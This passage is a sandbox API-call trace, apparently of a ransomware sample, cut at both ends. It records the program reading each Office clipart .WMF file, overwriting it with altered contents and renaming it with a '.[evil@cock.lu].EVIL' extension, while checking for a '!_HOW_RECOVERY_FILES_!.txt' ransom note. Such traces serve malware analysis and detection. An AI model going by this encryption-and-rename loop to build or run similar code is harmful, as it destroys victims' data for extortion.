lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.227] wcsstr (_Str="NA02398_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.227] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02398_.WMF") returned 69 [0161.227] wcscmp (_String1="NA02398_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.227] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02398_.WMF") returned 0x0 [0161.227] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02398_.WMF") returned 0x45 [0161.227] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02398_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02398_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.230] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e98, lpOverlapped=0x0) returned 1 [0161.240] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.240] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.240] _errno () returned 0x84b1160840 [0161.240] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.240] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ea0, lpOverlapped=0x0) returned 1 [0161.241] CloseHandle (hObject=0x1a8) returned 1 [0161.241] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02398_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.241] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.241] __uncaught_exception () returned 0x84b1160800 [0161.241] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.242] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02398_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02398_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02398_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02398_.wmf.[evil@cock.lu].evil")) returned 1 [0161.243] ??_V@YAXPEAX@Z () returned 0x1 [0161.246] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02398_.WMF", dwFileAttributes=0x200) returned 0 [0161.246] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.246] wcsstr (_Str="NA02400_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.246] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02400_.WMF") returned 69 [0161.246] wcscmp (_String1="NA02400_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.246] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02400_.WMF") returned 0x0 [0161.246] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02400_.WMF") returned 0x45 [0161.247] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02400_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02400_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.249] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd24, lpOverlapped=0x0) returned 1 [0161.252] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.252] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.252] _errno () returned 0x84b1160840 [0161.252] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.252] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd40, lpOverlapped=0x0) returned 1 [0161.252] CloseHandle (hObject=0x1a8) returned 1 [0161.252] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02400_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.252] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.253] __uncaught_exception () returned 0x84b1160800 [0161.253] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.253] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02400_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02400_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02400_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02400_.wmf.[evil@cock.lu].evil")) returned 1 [0161.254] ??_V@YAXPEAX@Z () returned 0x1 [0161.258] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02400_.WMF", dwFileAttributes=0x200) returned 0 [0161.258] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.258] wcsstr (_Str="NA02404_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.258] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02404_.WMF") returned 69 [0161.258] wcscmp (_String1="NA02404_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.258] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02404_.WMF") returned 0x0 [0161.258] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02404_.WMF") returned 0x45 [0161.258] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02404_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02404_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.260] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2120, lpOverlapped=0x0) returned 1 [0161.272] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.272] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.272] _errno () returned 0x84b1160840 [0161.272] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.272] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2140, lpOverlapped=0x0) returned 1 [0161.273] CloseHandle (hObject=0x1a8) returned 1 [0161.273] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02404_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.273] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.273] __uncaught_exception () returned 0x84b1160800 [0161.273] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.273] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02404_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02404_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02404_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02404_.wmf.[evil@cock.lu].evil")) returned 1 [0161.275] ??_V@YAXPEAX@Z () returned 0x1 [0161.278] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02404_.WMF", dwFileAttributes=0x200) returned 0 [0161.278] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.278] wcsstr (_Str="NA02405_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.278] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02405_.WMF") returned 69 [0161.278] wcscmp (_String1="NA02405_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.278] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02405_.WMF") returned 0x0 [0161.278] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02405_.WMF") returned 0x45 [0161.278] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02405_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.281] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5080, lpOverlapped=0x0) returned 1 [0161.284] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.284] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.284] _errno () returned 0x84b1160840 [0161.284] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.284] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x50a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x50a0, lpOverlapped=0x0) returned 1 [0161.284] CloseHandle (hObject=0x1a8) returned 1 [0161.285] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02405_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.285] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.285] __uncaught_exception () returned 0x84b1160800 [0161.285] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.285] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02405_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02405_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02405_.wmf.[evil@cock.lu].evil")) returned 1 [0161.287] ??_V@YAXPEAX@Z () returned 0x1 [0161.290] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02405_.WMF", dwFileAttributes=0x200) returned 0 [0161.290] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.290] wcsstr (_Str="NA02407_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.290] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02407_.WMF") returned 69 [0161.291] wcscmp (_String1="NA02407_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.291] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02407_.WMF") returned 0x0 [0161.291] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02407_.WMF") returned 0x45 [0161.291] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02407_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.293] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1fc8, lpOverlapped=0x0) returned 1 [0161.296] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.296] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.296] _errno () returned 0x84b1160840 [0161.297] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.297] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1fe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1fe0, lpOverlapped=0x0) returned 1 [0161.297] CloseHandle (hObject=0x1a8) returned 1 [0161.297] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02407_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.297] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.297] __uncaught_exception () returned 0x84b1160800 [0161.297] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.298] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02407_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02407_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02407_.wmf.[evil@cock.lu].evil")) returned 1 [0161.299] ??_V@YAXPEAX@Z () returned 0x1 [0161.302] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02407_.WMF", dwFileAttributes=0x200) returned 0 [0161.302] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.302] wcsstr (_Str="NA02413_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.302] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02413_.WMF") returned 69 [0161.302] wcscmp (_String1="NA02413_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.302] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02413_.WMF") returned 0x0 [0161.302] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02413_.WMF") returned 0x45 [0161.302] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.305] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x28ec, lpOverlapped=0x0) returned 1 [0161.308] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.308] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.308] _errno () returned 0x84b1160840 [0161.308] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.308] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x2900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2900, lpOverlapped=0x0) returned 1 [0161.308] CloseHandle (hObject=0x1a8) returned 1 [0161.308] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02413_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.309] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.309] __uncaught_exception () returned 0x84b1160800 [0161.309] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.309] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02413_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02413_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02413_.wmf.[evil@cock.lu].evil")) returned 1 [0161.310] ??_V@YAXPEAX@Z () returned 0x1 [0161.313] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02413_.WMF", dwFileAttributes=0x200) returned 0 [0161.313] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.314] wcsstr (_Str="NA02417_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.314] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02417_.WMF") returned 69 [0161.314] wcscmp (_String1="NA02417_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.314] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02417_.WMF") returned 0x0 [0161.314] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02417_.WMF") returned 0x45 [0161.314] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02417_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02417_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.316] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb24, lpOverlapped=0x0) returned 1 [0161.319] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.319] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.319] _errno () returned 0x84b1160840 [0161.319] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.319] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xb40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb40, lpOverlapped=0x0) returned 1 [0161.319] CloseHandle (hObject=0x1a8) returned 1 [0161.319] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02417_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.319] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.320] __uncaught_exception () returned 0x84b1160800 [0161.320] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.320] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02417_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02417_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02417_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02417_.wmf.[evil@cock.lu].evil")) returned 1 [0161.321] ??_V@YAXPEAX@Z () returned 0x1 [0161.324] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02417_.WMF", dwFileAttributes=0x200) returned 0 [0161.324] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.324] wcsstr (_Str="NA02423_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.324] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02423_.WMF") returned 69 [0161.324] wcscmp (_String1="NA02423_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.324] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02423_.WMF") returned 0x0 [0161.324] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02423_.WMF") returned 0x45 [0161.324] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02423_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02423_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.326] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2fb8, lpOverlapped=0x0) returned 1 [0161.329] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.329] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.329] _errno () returned 0x84b1160840 [0161.329] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.329] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x2fc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2fc0, lpOverlapped=0x0) returned 1 [0161.329] CloseHandle (hObject=0x1a8) returned 1 [0161.330] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02423_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.330] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.330] __uncaught_exception () returned 0x84b1160800 [0161.330] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.330] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02423_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02423_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02423_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02423_.wmf.[evil@cock.lu].evil")) returned 1 [0161.331] ??_V@YAXPEAX@Z () returned 0x1 [0161.334] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02423_.WMF", dwFileAttributes=0x200) returned 0 [0161.335] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.335] wcsstr (_Str="NA02424_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.335] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02424_.WMF") returned 69 [0161.335] wcscmp (_String1="NA02424_.WMF", 